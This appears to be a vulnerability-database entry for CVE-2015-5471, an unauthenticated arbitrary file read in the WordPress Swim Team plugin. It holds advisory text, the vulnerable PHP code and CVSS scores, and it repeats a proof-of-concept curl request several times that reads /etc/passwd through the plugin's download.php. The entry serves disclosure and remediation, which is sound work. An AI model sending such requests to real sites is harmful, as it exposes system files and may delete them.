ID WPEX-ID:8071
Type wpexploit
Reporter Larry W. Cashdollar
Modified 2019-10-22T00:00:00
Description
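WordPress Vulnerability - Swim Team <= v1.44.10777 - Local File Inclusion
Note: although this entry is titled "Local File Inclusion", the code quoted in the linked advisory passes the request's `file` parameter to fopen() and prints the contents back, so this is an unauthenticated arbitrary file read (CVE-2015-5471, CWE-22: absolute path traversal in include/user/download.php), not PHP code inclusion. The quoted block also calls @unlink($file) after reading, so the requested file may be deleted where the web server account has permission to do so; confirm this against the full plugin source. The advisory lists the issue as fixed in v1.45beta3. Sites running 1.44.10777 or earlier should upgrade or remove the plugin and review web server access logs for requests to include/user/download.php that carry an absolute path in `file`.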
$ curl "http://www.vapidlabs.com/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"
{"id": "WPEX-ID:8071", "type": "wpexploit", "bulletinFamily": "exploit", "title": "Swim Team <= v1.44.10777 - Local File Inclusion", "description": "WordPress Vulnerability - Swim Team <= v1.44.10777 - Local File Inclusion\n", "published": "2015-07-03T00:00:00", "modified": "2019-10-22T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "", "reporter": "Larry W. Cashdollar", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5471", "https://packetstormsecurity.com/files/132653/", "https://vapid.dhs.org/advisory.php?v=134", "https://wordpress.org/support/topic/security-vulnerability-6?replies=3#post-7141123"], "cvelist": ["CVE-2015-5471"], "lastseen": "2020-06-29T19:29:33", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-5471"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:8071"]}, {"type": "exploitdb", "idList": ["EDB-ID:37601"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:132653"]}], "modified": "2020-06-29T19:29:33", "rev": 2}, "score": {"value": 6.0, "vector": "NONE", "modified": "2020-06-29T19:29:33", "rev": 2}, "vulnersScore": 6.0}, "sourceData": "$ curl \"http://www.vapidlabs.com/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress\""}
{"cve": [{"lastseen": "2020-10-03T12:49:53", "description": "Absolute path traversal vulnerability in include/user/download.php in the Swim Team plugin 1.44.10777 for WordPress allows remote attackers to read arbitrary files via a full pathname in the file parameter.", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2016-01-12T19:59:00", "title": "CVE-2015-5471", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5471"], "modified": "2016-11-28T19:33:00", "cpe": ["cpe:/a:swim_team_project:swim_team:1.44.10777"], "id": "CVE-2015-5471", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5471", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:swim_team_project:swim_team:1.44.10777:*:*:*:*:wordpress:*:*"]}], "exploitdb": [{"lastseen": "2016-02-04T06:11:07", "description": "WordPress Swim Team Plugin 1.44.10777 - Arbitrary File Download. CVE-2015-5471. 
Webapps exploit for php platform", "published": "2015-07-13T00:00:00", "type": "exploitdb", "title": "WordPress Swim Team Plugin 1.44.10777 - Arbitrary File Download", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-5471"], "modified": "2015-07-13T00:00:00", "id": "EDB-ID:37601", "href": "https://www.exploit-db.com/exploits/37601/", "sourceData": "Title: Remote file download vulnerability in Wordpress Plugin wp-swimteam v1.44.10777\r\nAuthor: Larry W. Cashdollar, @_larry0\r\nDate: 2015-07-02\r\nDownload Site: https://wordpress.org/plugins/wp-swimteam\r\nVendor: Mike Walsh www.MichaelWalsh.org\r\nVendor Notified: 2015-07-02, fixed in v1.45beta3\r\nVendor Contact: Through website\r\nAdvisory: http://www.vapid.dhs.org/advisory.php?v=134\r\nDescription: Swim Team (aka wp-SwimTeam) is a comprehensive WordPress plugin to run a swim team including registration, volunteer assignments, scheduling, and much more.\r\nVulnerability:\r\nThe code in ./wp-swimteam/include/user/download.php doesn't sanitize user input from downloading sensitive system files:\r\n\r\n\r\n 50 $file = urldecode($args['file']) ;\r\n 51 $fh = fopen($file, 'r') or die('Unable to load file, something bad has happened.') ;\r\n 52 \r\n 53 while (!feof($fh))\r\n 54 $txt .= fread($fh, 1024) ;\r\n 55 \r\n 56 // Clean up the temporary file - permissions\r\n 57 // may prevent this from succeedeing so use the '@'\r\n 58 // to suppress any messages from PHP.\r\n 59 \r\n 60 @unlink($file) ;\r\n 61 }\r\n 62 \r\n 63 $filename = urldecode($args['filename']) ;\r\n 64 $contenttype = urldecode($args['contenttype']) ;\r\n 65 \r\n 66 // Tell browser to expect a text file of some sort (usually txt or csv)\r\n 67 \r\n 68 header(sprintf('Content-Type: application/%s', $contenttype)) ;\r\n 69 header(sprintf('Content-disposition: attachment; filename=%s', $filename)) ;\r\n 70 print $txt ;\r\n\r\nCVEID:\r\nOSVDB:\r\nExploit Code:\r\n\r\n \u00e2\u0080\u02d8 $ curl 
\"http://server/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress\"", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/37601/"}], "wpvulndb": [{"lastseen": "2020-06-29T19:29:33", "bulletinFamily": "software", "cvelist": ["CVE-2015-5471"], "description": "WordPress Vulnerability - Swim Team <= v1.44.10777 - Local File Inclusion \n\n### PoC\n\n$ curl \"http://www.vapidlabs.com/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename;=/etc/passwd&contenttype;=text/html&transient;=1&abspath;=/usr/share/wordpress\"\n", "modified": "2019-10-22T00:00:00", "published": "2015-07-03T00:00:00", "id": "WPVDB-ID:8071", "href": "https://wpvulndb.com/vulnerabilities/8071", "type": "wpvulndb", "title": "Swim Team <= v1.44.10777 - Local File Inclusion", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}